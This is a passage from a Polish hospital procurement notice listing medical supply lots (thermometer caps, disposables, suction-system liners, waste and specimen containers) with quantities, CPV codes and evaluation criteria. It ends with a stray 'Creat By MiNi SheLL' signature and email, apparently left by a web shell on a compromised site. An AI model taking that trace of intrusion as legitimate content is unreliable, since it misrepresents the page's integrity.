poz. 1 zaoferowanie przyrządów do przetaczania płynów infuzyjnych z dwuczęściową komorą kroplową, gdzie dolna część komory powinna być elastyczna o porównywalnej wielkości do sztywnej górnej części komory, która ułatwia wygodny uchwyt i wkłucie w pojemniki z płynami infuzyjnymi,  posiadajace specjalne miejsce na kolec komory kroplowej zabezpieczający przed zakłuciem po wykonanej procedurze.
poz. 4 zaoferowanie przyrządów  zawierających ftalany.
poz. 5 przyrząd do przetoczeń z możliwością pomiaru OCŻ ze skalą wykonaną z odpornego na złamania plastiku i dokładności pomiaru od +35 do -15cm H2O oraz oznaczeniem na wyrobie oraz opakowaniu jednostkowym i zbiorczym logo lub nazwy producenta . Wyrób ma być zgodny z Rozporządzeniem Ministra Zdrowia z dnia 12 stycznia 2011r w sprawie wymagań zasadniczych oraz procedur oceny zgodności wyrobów medycznych, a tym samym ma być zgodny z Ustawą o Wyrobach Medycznych z dnia 20 maja 2010
  										
							 			 
	UWAGA !							 		
	1.  Brak wypełnienia kolumny Numer katalogowy i Nazwa handlowa i producent, kraj wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: nie stosuje. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiającego należy wpisać zwrot - Jak u Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.24-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. jakość - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - kapturki do termometrów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Końcówka - kapturek jednorazowego użytku do termometru elektronicznego typ Braun Pro - 3000 			szt.	30 000
UWAGA !							 		
1.  Brak wypełnienia kolumny Numer katalogowy i Nazwa handlowa i producent, kraj wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: nie stosuje. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiającego należy wpisać zwrot - Jak u Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - sprzęt medyczny jednorazowy (różny).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Etykieta  (naklejka) na probówkę -gładka bez nadruku 1 op. a 100 szt.			op. 	900
2	Fartuch foliowy tzw. Przedniak 1 op. A 100 szt.			op.	35
3	Folia - koc izotermiczny			szt.	400
4	Golarka medyczna jednorazowego użytku jednoostrzowa typu Gallant			szt.	6 000
5	Kanka odbytnicza dla dorosłych ch 30 , 10 x 400 mm			szt.	30
6	Kanka odbytnicza dla dzieci ch 16 długość 200 mm			szt.	10
7	Kieliszki jednorazowe - plastikowe op. a 100 szt			op.	650
8	Kranik - rampa pięciodrożny			szt.	100
9	Kranik trójdrożny			szt.	7 000
10	Kranik LUER-LOK z drenem o dł.10 cm.			szt.	50
11	Nerka jednorazowa			szt.	36 000
12	Ochraniacze na obuwie jednorazowe na gumce			szt.	1 000
13	Opaska do identyfikacji dzieci i dorosłych			szt.	13 000
14	Opaska do identyfikacji noworodków ( bezpieczne  zapięcie)			szt.	2 800
15	Osłonki medyczne - prezerwatywy -  pakowana pojedyńczo			szt.	4 800
16	Pałeczki do wymazów sterylne - długość 20 - 22 cm			szt.	3 000
17	Patyczek drewniany bez wacika 1 op. A 100 szt.			op.	10
18	Pinceta jednorazowa sterylna pakowana pojedyńczo			szt.	1 200
19	Probówka do wymazów - sucha			szt.	3 100
20	Przedłużacz do pompy infuzyjnej  			szt.	9 000
21	Przedłużacz do pompy infuzyjnej bursztynowy 			szt.	350
22	Słuchawka lekarska			szt.	20
23	Staza automatyczna  typu HS-403 posiadająca  prosty mechanizm umożliwiajacy łatwe zapinanie i odpinanie oraz płynną zmianę siły zacisku  jednym przyciskiem, do sterylizacji w autoklawie do 120 °C 			szt.	120
24	Staza gumowa			szt.	10
25	Szczoteczki chirurgiczne typu Super Brush do wielokrotnej sterylizacji			szt.	120
26	Szpatułki drewniane 1 op. a 100 szt.			op.	150
27	Worek do zwłok zapinany na zamek			szt.	30
28	Wymazówka okulistyczna plastikowa, dł.130 mm z wacikiem, w probówce średnica oczka 1,5 mm pakowana pojedyńczo, sterylna			szt.	50
29	Wymazówka z podłożem AMIES			szt.	2 300
30	Wymazówki transportowe z podłożem węglowym, pakowane idywidualnie, aplikator z tworzywa, dł 15 - 17 cm, sterylne			szt.	200
31	Zaciskacz do pępowiny			szt.	900
32	Zestaw do lewatywy mikrobiologicznie czysty lub sterylny			szt.	1 300
33	Zestaw do wlewów kontrastowych bez barytu			szt.	150
34	Żel do USG - 0,5 kg - biały			szt.	600
 Zamawiający wymaga :
poz.4  Golarka jednorazowego użytku  musi być wyposażona w specjalnie zaprojektowany grzebień zapobiegający zapychaniu ostrza, konstrukcja rączki umożliwiająca jej odłamanie po zakończeniu golenia, wycięcie w uchwycie umożliwiające dokładny widok golonego obszaru,ostrze wykonane ze stali nierdzewnej,produkt sklasyfikowany jako wyrób medyczny.
poz.25 Szczotka chirurgiczna składa się z korpusu  o wymiarach D.110 × SZ.40 × W.20 mm wykonanego z tworzywa sztucznego typu Malen oraz oszczotkowania głównego i pomocniczego  (do mycia opuszków palców i paznokci). Oszczotkowanie wykonane jest z tworzywa o najwyższej jakości z włókien sztucznych typu Tynex .
poz. 20 i 21 zaoferowania asortymentu bez ftalanów.

 										
										
										
 Zamawiajacy dopuszcza:
poz.32 i 33 zestawy posiadajace ftalany 										
 										
	UWAGA !							 		
	1.  Brak wypełnienia kolumny Numer katalogowy i Nazwa handlowa i producent, kraj wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: nie stosuje. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiającego należy wpisać zwrot - Jak u Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - wkłady, konistry do systemu do odsysania Vacsax.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wkład workowy 1xużytku : 
a) Wkład wykonany z wysokozagęszczonego polietylenu(bez zawartosci PCV),posiadający funkcję samozasysania, uszczelniany samoczynnie po uruchomieniu ssania bez koniecznosci wciskania go w kanister i podłączenia dodatkowych urządzeń lub przełączników:
b)Wyposażony w filtr antybakteryjny i hydrofobowy(nie mylić z zastawką) zabezpieczający źródło ssania przed zalaniem- automatyczne odcięcie ssania po napełnieniu się wkładu;
c)Posiadajacy zintegrowaną pokrywę wyposażoną w tylko dwa króćce(porty):pacjent oraz próżnia;
d)Wkład bez dodatkowych otworów w pokrywie poza króćcami ssania i pacjenta- nie dochodzi do rozszczelnienia wkładu oraz nie ma ryzyka przypadkowego wylania się substancji odsysanej i tym samym nie ma ryzyka kontaktu z wydzieliną - bezpieczne żelowanie wkładu zarówno czystego jak i odessaną wydzieliną przez króciec (port) pacjenta;			szt	2 000
	e) Kompatybilnosć wkładów z kanistrami różnej pojemności- możliwość użycia mniejszych wkładów w większych kanistrach; 
f)Wyposażony w dwa uchwyty w postaci pętli do demontażu wkładu po jego zapełnieniu; 
g)Data ważności nadrukowana fabrycznie 
na każdym wkładzie;
h) Każdy wkład wyposażony w zatyczki 
na port pacjenta i port próżni;
i)Podziałka co 100 ml. na wkładzie 2l;
- pojemność 1000 ml
- pojemność 2000 ml;
- pojemność 3000 ml.   				
2.	Kanister wielorazowego użytku:
a) Wykonany z przezroczystego, nietłukącego się tworzywa, ocechowany skalą pomiarową co 100 ml do pełnej pojemności oferowanego wkładu ( 1000, 2000, 3000, ml );
b) Odporny na środki dezynfekujące, światło UV ( lampy bakteriobójcze UV ) oraz parę;
c) Kompatybilny z wkładami 1x użytku, wyposażony w uchwyt do mocowników ściennych, szynowych lub wózków jezdnych;
d) Kanister nie posiada żadnych dodatkowych przyłączy ( otworów ) typu próżnia/ssanie. Wszystkie kanistry są wielokrotnego użytku ( z możliwością ich autoklawowania w tem. do 121C )- nie zawierają PCV;
e) Każdy kanister posiada informację o metodzie sterylizacji;
- Pojemność 1000 ml;
- Pojemność 2000 ml;
- Pojemność 3000 ml.
			szt	10
3.	Torba na wymiociny jednorazowego użytku:
- wykonana z przeźroczystego materiału,
- wyskalowana co 100 ml., 
- uchwyt posiada wcięcie umożliwiajace higieniczne zamknięcie, odcinające przy tym źródło przykrego zapachu,
- pojemność 1500 ml.			szt	400
4	Żel do wkładów do ssaka opakowanie typu wiadro  a 4 kg			szt	20
5	Butelka z żelem 36 g. zasysajaca się do systemu VACSAX			szt	30
6	Filtr hydrofobowy nakładany na dren			szt	25
7	Zwężany łącznik do drenów			szt	300
UWAGA !							 		
1.  Brak wypełnienia kolumny Numer katalogowy i Nazwa handlowa i producent, kraj wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: nie stosuje. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiającego należy wpisać zwrot - Jak u Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - pojemniki jednorazowego użytku - różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pojemnik na odpady szpitalne 0,7 l plastikowy (owalny, płaski - elipsa) na venflon do toreb medycznych, na wyposażenie karetek pogotowia			szt.	300
2	Pojemnik na odpady szpitalne 1 l plastikowy 			szt.	2 200
3	Pojemnik na odpady szpitalne 2 l plastikowy			szt.	2 400
4	Pojemnik na odpady szpitalne 10 l - plastikowy typu wiadro			szt.	700
5	Pojemnik histopatologiczny 60 -  70 ml zakręcany z 
pokrwką i zakrętką			szt.	800
6	Pojemnik histopatologiczny 120 - 125 ml zakręcany z pokrwką i zakrętką			szt.	300
7	Pojemnik histopatologiczny 200-250 ml zakręcany z pokrwką i zakrętką			szt.	500
8	Pojemnik histopatologiczny 500 ml zakręcany z pokrwką i zakrętką			szt.	200
9	Pojemnik histopatologiczny 1000 ml zakręcany z pokrwką i zakrętką			szt.	300
10	Pojemnik histopatologiczny 3000 ml szczelnie zamykany			szt.	50
11	Pojemnik na kał			szt.	800
12	Pojemnik na posiew moczu sterylny ( 100 ml)			szt.	2 700
13	Pojemnik do moczu PP 100 - 120 ml			szt.	16 000
Zamawiający wymaga dostarczenia po 1 szt. z poz.1,5,6,7,8,9,10							 			 
							 			 
	UWAGA !							 		
	1.  Brak wypełnienia kolumny Numer katalogowy i Nazwa handlowa i producent, kraj wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: nie stosuje. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiającego należy wpisać zwrot - Jak u Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com